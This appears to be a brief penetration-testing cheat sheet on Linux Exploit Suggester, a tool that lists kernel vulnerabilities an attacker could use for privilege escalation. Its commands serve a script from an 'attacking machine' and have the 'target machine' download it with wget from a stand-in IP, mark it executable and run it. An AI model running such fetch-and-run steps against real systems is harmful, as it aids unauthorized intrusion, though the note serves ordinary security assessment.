## General Linux Exploitation Suggester (LES) is a tool that checks the operating system (OS) and version of a machine and suggests potential kernel vulnerabilities that could be exploited. LES is typically used by security professionals to assess the security of a system and identify weaknesses that need to be addressed. ## Commands ``` # Attacking Machine python3 -m http.server # Target Machine wget http://IP/Name.sh chmod +x NAME.sh ./NAME.sh ``` - Check for exposure (Probability of success) ## Linux Exploit Suggester **All Information** ---> https://github.com/mzet-/linux-exploit-suggester